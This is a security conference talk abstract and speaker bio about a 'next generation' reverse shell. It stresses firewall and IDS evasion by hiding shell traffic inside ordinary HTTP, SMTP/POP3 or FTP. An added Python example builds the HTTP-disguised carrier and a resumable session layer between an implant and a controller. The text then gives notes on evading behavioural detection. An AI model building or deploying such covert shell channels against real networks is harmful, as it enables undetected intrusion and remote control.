AR (Independent Network Security Researcher, Securebits)
Presentation Title: Next Generation Reverse Shell (NGRS)
Presentation Abstract:
The purpose of the Next Generation Reverse Shell [NGRS] is to bring the reverse shell concept to a new, mature level. Existing reverse shell implementations and tools lack reliability, stealth, flexibility, filtering evasion, and maintainability. NGRS introduces a new, original implementation that addresses IDS evasion, lets the operator change the carrier protocol (e.g. HTTP, SMTP/POP3, or FTP), maintains the open session, and provides a reliable way of ensuring that the established session continues. When used correctly, NGRS gives security professionals (e.g. penetration testers and consultants) and attackers alike full shell access to internal hosts of corporations and organizations even when the corporate firewall blocks all incoming (inbound) connections and allows only a single outgoing (outbound) connection to port 80 (HTTP), 25 (SMTP)/110 (POP3), or 21 (FTP). NGRS also works where an IDS or application inspection device permits only standard HTTP, standard SMTP/POP3, or standard FTP, because the traffic NGRS generates fully complies with the standard implementation of HTTP, SMTP/POP3, or FTP.
Looking at the existing reverse shell implementations, one finds the following weaknesses. First, they implement their own text-based protocol; in many cases raw text is simply sent over TCP without a properly organized application-level protocol. Even if the port the reverse shell uses is open on the firewall, an IDS or packet inspector will stop such traffic because it is non-standard. Second, once the reverse shell is established to a particular port, the user controlling the session cannot change that port dynamically; to change it, the user has to establish a new connection manually by running a new instance of the reverse shell application on the remote machine with the intended port. Third, the reverse shell application is not smart enough to maintain a reliable session for a long period of time, or to re-establish the session automatically if something goes wrong in the middle of a connection.
So the aim of NGRS is to introduce an enhanced technique and an advanced implementation of the reverse shell, one that brings the reverse shell technique up to a level appropriate to the modern era of network security. The Next Generation Reverse Shell [NGRS] addresses the aforementioned weaknesses as follows:
A. Reliability
B. Stealthiness
C. IDS and Application Inspection Evasion
D. Flexibility
E. Maintainability
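To make the three ideas in the abstract concrete (a carrier that is syntactically ordinary HTTP, a carrier that can be swapped without touching the session logic, and a session that survives a dropped connection), here is an added Python example. It is an illustration written for this page and is not NGRS's own code: the frame layout (session id, sequence number, cumulative acknowledgement and base64 data inside an ordinary form body), the host name updates.example.invalid and the path /sync are assumptions, and it executes no commands; only the framing and the session bookkeeping are shown.

```python
"""Carrier and session layer for a reverse shell tunnelled through valid HTTP/1.1.
Added illustration, not NGRS's own code: the frame layout (session id, seq, ack,
base64 data in a form body), host name and path are assumptions; no command runs."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlencode

# RFC 7230 field-name characters, ":", optional whitespace, then the value
_HEADER_RE = re.compile(rb"^([!#$%&'*+\-.^_|~0-9A-Za-z]+):[ \t]*(.*?)[ \t]*$")

@dataclass(frozen=True)
class Frame:
    sid: str     # session identifier (assumed: an opaque string)
    seq: int     # sequence number, 0 = frame carries no new data
    ack: int     # highest contiguous seq received from the peer
    data: bytes  # opaque payload: command text or command output

class HttpCarrier:
    """Implant->controller frames ride as POST bodies, controller->implant frames
    as 200 OK bodies, both application/x-www-form-urlencoded, so a protocol
    validator sees an ordinary form submission and its reply.  Session uses only
    wrap()/unwrap(), so another standard protocol can be swapped in here."""
    host, path = "updates.example.invalid", "/sync"  # assumed values

    def wrap(self, frame: Frame, to_controller: bool) -> bytes:
        body = urlencode({"s": frame.sid, "n": frame.seq, "a": frame.ack,
                          "d": base64.b64encode(frame.data).decode()}).encode()
        lines = ([f"POST {self.path} HTTP/1.1", f"Host: {self.host}"]
                 if to_controller else ["HTTP/1.1 200 OK"])
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}"]
        return "\r\n".join(lines).encode() + b"\r\n\r\n" + body

    def unwrap(self, wire: bytes, to_controller: bool) -> Frame:
        head, sep, body = wire.partition(b"\r\n\r\n")
        start, *raw = head.split(b"\r\n")
        want = f"POST {self.path} HTTP/1.1" if to_controller else "HTTP/1.1 200 OK"
        if not sep or start != want.encode():
            raise ValueError("not a well-formed message of the expected kind")
        parsed = [_HEADER_RE.match(line) for line in raw]
        if not all(parsed):
            raise ValueError("malformed header line")
        headers = {m.group(1).lower(): m.group(2) for m in parsed}
        # The framing check an inspecting proxy makes as well.
        if (int(headers.get(b"content-length", b"-1")) != len(body)
                or headers.get(b"content-type") != b"application/x-www-form-urlencoded"):
            raise ValueError("body is not what the headers declare")
        q = parse_qs(body.decode("ascii"), keep_blank_values=True, strict_parsing=True)
        return Frame(q["s"][0], int(q["n"][0]), int(q["a"][0]), base64.b64decode(q["d"][0]))

class Session:
    """Resumable delivery: unacked frames are re-sent after a reconnect, duplicates dropped."""
    def __init__(self, sid: str) -> None:
        self.sid, self.next_seq, self.last_received = sid, 1, 0
        self.unacked: Dict[int, bytes] = {}

    def send(self, data: bytes) -> Frame:
        seq, self.next_seq = self.next_seq, self.next_seq + 1
        self.unacked[seq] = data
        return Frame(self.sid, seq, self.last_received, data)

    def poll(self) -> Frame:  # no data, only our ack, so the peer may answer with data
        return Frame(self.sid, 0, self.last_received, b"")

    def receive(self, frame: Frame) -> Optional[bytes]:  # None for polls and duplicates
        if frame.sid != self.sid or frame.seq > self.last_received + 1:
            raise ValueError("foreign session, or a frame was lost in between")
        for seq in [s for s in self.unacked if s <= frame.ack]:
            del self.unacked[seq]  # cumulative acknowledgement
        if frame.seq <= self.last_received:
            return None
        self.last_received = frame.seq
        return frame.data

    def pending(self) -> List[Frame]:  # still unacknowledged: re-sent after a reconnect
        return [Frame(self.sid, s, self.last_received, d) for s, d in sorted(self.unacked.items())]

def rejects(carrier: HttpCarrier, wire: bytes, to_controller: bool) -> bool:
    try:  # True if the carrier (or an equally strict inspector) refuses the bytes
        carrier.unwrap(wire, to_controller)
        return False
    except (ValueError, KeyError):
        return True

def demo(carrier: HttpCarrier = HttpCarrier()) -> dict:
    def hop(frame: Frame, to_controller: bool) -> Frame:  # one trip across the wire
        return carrier.unwrap(carrier.wrap(frame, to_controller), to_controller)
    controller, implant = Session("c0ffee"), Session("c0ffee")
    controller.receive(hop(implant.poll(), True))
    delivered = [implant.receive(hop(controller.send(b"id"), False))]
    reply = carrier.wrap(implant.send(b"uid=1000(user)"), True)  # lost: never arrives
    resent = [carrier.wrap(f, True) for f in implant.pending()]  # reconnect and re-send
    delivered += [controller.receive(carrier.unwrap(w, True)) for w in resent]
    dup = controller.receive(carrier.unwrap(resent[0], True))  # an over-eager second retry
    implant.receive(hop(controller.send(b"hostname"), False))  # its ack=1 empties the queue
    return {"delivered": delivered, "duplicate": dup, "implant_pending": len(implant.pending()),
            "raw_text_rejected": rejects(carrier, b"cmd: whoami\r\n", True),
            "truncated_rejected": rejects(carrier, reply[:-3], True)}
```

The strictness of unwrap() is the point: a message is accepted only when it is exactly what its own start line and headers declare, which is the test a protocol-validating proxy applies, so the raw "cmd: whoami" text an old-style reverse shell would push over TCP is refused by the carrier just as it would be by the inspector. Reliability lives entirely in Session: nothing above the carrier cares whether the underlying TCP connection survived, only whether the sequence numbers did, so a reconnect is just "re-send pending()" and the receiver silently drops whatever it has already seen. One caveat a practitioner should keep in mind: syntactic compliance only gets a message past protocol validation; an implant that posts to the same path at a fixed interval remains distinguishable by its cadence and volume, so evading content inspection and evading behavioural detection are separate problems.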
About AR
AR is both an independent researcher and an engineer in the field of network security. He works for Consolidated Contractors International Company [CCIC], which is based in Greece. His responsibilities range from the design, architecture and deployment of large-scale security solutions to vulnerability assessment and penetration testing.
AR’s main interest is in stretching existing network attack and defense methodologies, researching new ones, and providing working tools and PoCs that demonstrate his research. He has spoken before at Ruxcon, an Australian hacker convention. He is also a Certified Ethical Hacker (CEH) and has a university degree in Computer Engineering. His research can be found at http://www.securebits.org.